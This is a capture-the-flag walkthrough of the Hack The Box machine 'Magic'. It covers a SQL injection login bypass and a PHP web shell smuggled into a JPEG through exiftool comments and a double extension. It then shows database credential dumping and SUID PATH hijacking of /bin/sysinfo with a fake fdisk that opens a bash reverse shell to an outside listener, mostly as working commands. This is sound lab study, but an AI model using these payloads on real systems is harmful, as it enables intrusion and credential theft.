✅Magic (Medium)
Lesson Learn
Report-Penetration
Vulnerable Exploit: SQL Injection, Improper Validation
System Vulnerable: 10.10.10.185
Vulnerability Explanation: The machine is vulnerable to SQL Injection which could allow us to bypass authentication. We can bypass file upload and gain shell on the machine.
Privilege Escalation Vulnerability: Misconfigure on SUID
Vulnerability Fix: Sanitize Input and least privilege.
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.185
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 10:41 EST
Nmap scan report for 10.10.10.185
Host is up (0.040s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home - CUPS 2.2.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumeration
Port 80 Apache/2.4.29
Running gobuster to check hidden directory.
└─$ gobuster dir -u http://10.10.10.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.185
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/11/29 10:43:11 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.10.185/assets/]
/upload.php (Status: 302) [Size: 2957] [--> login.php]
/index.php (Status: 200) [Size: 4529]
/login.php (Status: 200) [Size: 4221]
/images (Status: 301) [Size: 313] [--> http://10.10.10.185/images/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/backdoor.php (Status: 200) [Size: 0]
/server-status (Status: 403) [Size: 277]
===============================================================
2021/11/29 10:49:21 Finished
===============================================================
SQL Injection
We found a login webpage. Can try SQL Injection. By simply inject ' or 1=1-- - we are in.
Burp bypass Login
By visiting /upload.php, it will response with 302 status code.
Go to Burp > Proxy > Options Tab > Match and Replace
Again visiting the /upload.php it doesn't require authenticate.
Let try to upload file but it accepted only image file extension.
On index.php, there are a lots of photo and the path stored /images/uploads/name.jpg.
Let create a php shell file with magic word of gif and double extension.
└─$ cat shell.php.png
GIF8
<?php system($_REQUEST['cmd']; ?>Once, we have uploaded, there is another restriction.
Let add PHP code into image file.jpg.
└─$ exiftool -Comment='<?php system($_GET['cmd']); ?>' file.jpg
1 image files updated
└─$ mv file.jpg file.php.jpg
└─$ file file.php.jpg
file.php.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "<?php system($_GET[cmd]); ?>", baseline, precision 8, 626x626, components 3Let uploads, this time it's working and we can confirms code execution.
Exploitation
Let send the request to burp and inject bash reverse shell with URL encoded.
Privilege Escalation
Shell as theseus
www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
Let try to access via SSH with credential but it doesn't work.
└─$ ssh theseus@10.10.10.185
The authenticity of host '10.10.10.185 (10.10.10.185)' can't be established.
ECDSA key fingerprint is SHA256:yx0Y6af8RGpG0bHr1AQtS+06uDomn1MMZVzpNaHEv0A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.185' (ECDSA) to the list of known hosts.
theseus@10.10.10.185: Permission denied (publickey).Let access through mysql.
www-data@ubuntu:/var/www/Magic$ netstat -tupln
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:60080 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp6 0 0 :::47455 :::* -
udp6 0 0 :::5353 :::* - mysql localhost
/www-data@ubuntu:/var/www/Magic$ mysqldump --databases Magic --user=theseus --password=iamkingtheseus
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;www-data@ubuntu:/var/www/Magic$ su theseus
Password:
theseus@ubuntu:/var/www/Magic$ whoami
theseus
theseus@ubuntu:/var/www/Magic$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)Shell as root
Find misconfigure SUID file.
/bin/sysinfo
theseus@ubuntu:~$ find / -type f -perm -4000 -ls 2>/dev/null
393232 24 -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfoRunning ltrace with /bin/sysinfo. It's going to run fdisk but not full path.
popen("fdisk -l", "r") = 0x56463337f280
fgets(fdisk: cannot open /dev/loop0: Permission denied
fdisk: cannot open /dev/loop1: Permission denied
fdisk: cannot open /dev/loop2: Permission denied
fdisk: cannot open /dev/loop3: Permission denied
fdisk: cannot open /dev/loop4: Permission denied
fdisk: cannot open /dev/loop5: Permission denied
fdisk: cannot open /dev/loop6: Permission denied
Let create a file with bash reverse shell and save as fdisk on /tmp.
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.24/5555 0>&1' > fdisk
chmod +x fdiskExport the PATH.
theseus@ubuntu:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
theseus@ubuntu:/tmp$ export PATH="/tmp:$PATH"
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/gamesLet start netcat listener on port 5555 and run /bin/sysinfo.
nc -lvp 5555
Last updated